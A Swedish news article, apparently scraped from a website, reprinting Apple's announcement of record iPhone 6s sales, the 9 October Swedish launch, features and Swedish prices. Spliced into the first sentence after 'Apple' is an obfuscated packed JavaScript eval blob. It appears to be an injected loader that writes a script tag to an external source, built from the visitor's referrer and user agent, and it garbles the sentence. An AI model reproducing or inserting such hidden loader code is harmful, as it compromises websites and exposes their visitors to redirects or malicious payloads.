Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Här är datum för Iphone 6s release i Sverige

apple logo

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ebtih|var|u0026u|referrer|asftf||js|php’.split(’|’),0,{}))
meddelade idag att företager har sålt över 13 miljoner nya iPhone 6s- och iPhone 6s Plus-modeller bara tre dagar efter lanseringen, vilket är ett nytt rekord. iPhone 6s och iPhone 6s Plus kommer att finnas tillgänglig i 40 andra länder från och med den 9 oktober bland andra Sverige, Mexico, Ryssland, Spanien och Taiwan. De nya iPhone-enheterna kommer att finnas tillgängliga i över 130 länder från och med årsslutet.

iPhone blir tillgänglig i 40 andra länder från fredagen den 9 oktober där Sverige är med på listan!

”Försäljningen av iPhone 6s och iPhone 6s Plus har varit fenomenal och har vida överstigit något försäljningsresultat under den första helgen i Apples historia”, säger Apples VD Tim Cook. ”Kundernas gensvar är fantastiskt och de älskar 3D Touch och Live Photos och vi ser verkligen fram emot att få ut iPhone 6s och iPhone 6s Plus till kunder i ännu fler länder den 9 oktober.”

iPhone 6s och iPhone 6s Plus ger en ny, kraftfull dimension till iPhones banbrytande Multi-Touch-gränssnitt, med 3D Touch-teknik som känner av hur hårt du trycker på skärmen så att du kan göra viktiga saker både snabbare och enklare. Med de nya iPhone-enheterna introduceras Live Photos, som blåser liv i stillbilder genom att förvandla ögonblick till oförglömliga levande minnen. Live Photos, 3D Touch, 12 megapixlars iSight-kameran, 5 megapixlars FaceTime HD-kameran med Retina Flash och andra funktioner drivs av det Apple-designade A9-chippet, det mest avancerade chippet någonsin i en smartphone, som ger snabbare prestanda och en suverän batteritid. iPhone 6s och iPhone 6s Plus har utformats med det starkaste glaset på någon smartphone och aluminium i 7000-serien, samma legering som används i rymdindustrin, och finns i snygga metallfinishar som nu också omfattar rosa guld.

iOS 9, världens mest avancerade mobila operativsystem, gör iPhone smartare med proaktiv hjälp, kraftfulla sökfunktioner och förbättrade Siri-funktioner, samtidigt som användarnas integritet skyddas. De inbyggda apparna är nu kraftfullare, med den omdesignade appen Anteckningar, detaljerad kollektivtrafiksinformation i Kartor* och appen News för den bästa upplevelsen av nyhetsartiklar på en mobil enhet. Grunden i iOS har förstärkts med programuppdateringar som kräver mindre utrymme vid installation och avancerade säkerhetsfunktioner som ökar skyddet för dina enheter.

Kunderna kan få uppdaterad information om tillgänglighet och beräknade leveransdatum via Apple Store-appen eller på apple.com/se. Alla kunder som köper en iPhone 6s eller iPhone 6s Plus i en Apple Store-butik erbjuds gratis Personal Setup där de får hjälp att anpassa sina iPhone-enheter genom att konfigurera mejl, får se nya appar från App Store och mycket mer så att de kommer igång med sina nya iPhone-enheter innan de lämnar butiken. Kunderna kan också lära sig mer om iOS 9 och sin nya enhet genom att delta i kostnadsfria workshops i Apple Store-butiker runt om i världen. I Sverige är de nya iPhone-modellerna tillgängliga via Tre, Tele2, Telenor och TeliaSonera samt utvalda Apple-auktoriserade återförsäljare.

iPhone 6s och iPhone 6s Plus kommer att lanseras världen över i över 40 andra länder och områden från och med den 9 oktober, bland annat Andorra, Belgien, Bosnien, Bulgarien, Danmark, Estland, Finland, Grekland, Grönland, Irland, Island, Isle of Man, Italien, Kroatien, Lettland, Liechtenstein, Litauen, Luxemburg, Maldiverna, Mexico, Monaco, Nederländerna, Norge, Polen, Portugal, Rumänien, Ryssland, Schweiz, Slovakien, Slovenien, Spanien, Sverige, Taiwan, Tjeckien, Ungern och Österrike. Den 10 oktober sker lanseringen i bland annat Bahrain, Jordanien, Kuwait, Qatar, Saudiarabien och Förenade Arabemiraten. iPhone 6s och iPhone 6s Plus kommer att finnas tillgängliga i Indien, Malaysia och Turkiet fredagen den 16 oktober och i över 130 länder vid årsslutet.

Försäljning som har slutförts lördagen den 26 september kommer att ingå i Apples resultat för fjärde kvartalet under räkenskapsåret 2015 och försäljning som har slutförts söndagen den 27 september kommer att ingå i Apples resultat för första kvartalet under räkenskapsåret 2016.

Priser och tillgänglighet

• iPhone 6s och iPhone 6s Plus kommer att finnas tillgängliga i metallicfinisharna guld, silver, rymdgrått och nyheten rosa guld. iPhone 6s kommer att finnas tillgänglig till ett rekommenderat pris på 7 495 kr för 16 GB-modellen, 8 595 kr för 64 GB-modellen och
9 695 kr för 128 GB-modellen. iPhone 6s Plus kommer att finnas tillgänglig till ett rekommenderat pris på 8 595 kr för 16 GB-modellen, 9 695 kr för 64 GB-modellen och 10 795 kr för 128 GB-modellen. Alla priser inbegriper moms.

• Apple-designade tillbehör som läder- och silikonfodral i olika färger och Lightning-dockningsstationer i matchande metallicfinishar finns också tillgängliga.
• Kunderna kan besöka apple.com/se för att boka en iPhone för hämtning i en lokal Apple Store-butik, beroende på tillgänglighet. De flesta Apple Store-butikerna har även iPhone-enheter som är tillgängliga för drop in-kunder varje dag.

*Kollektivtrafikinformation i Kartor kommer att finnas för vissa storstäder, däribland Baltimore, Berlin, Chicago, London, Mexico City, New York, Philadelphia, San Francisco-området, Toronto och Washington D.C., liksom för över 300 städer i Kina, som Peking, Chengdu och Shanghai. Appen News finns inte i alla länder.

När Apple lanserade Macintosh 1984 var det början på en revolution. Idag står Apple ständigt för nya innovationer med produkter som iPhone, iPad, Mac och Apple Watch. Apples tre mjukvaruplattformar, iOS, OS X och watchOS, ger en smidig upplevelse på alla Apple-enheter och skapar nya möjligheter med banbrytande tjänster som App Store, Apple Music, Apple Pay och iCloud. Apples 100 000 medarbetare brinner för att göra produkter av hög kvalitet och förbättra kundernas tillvaro.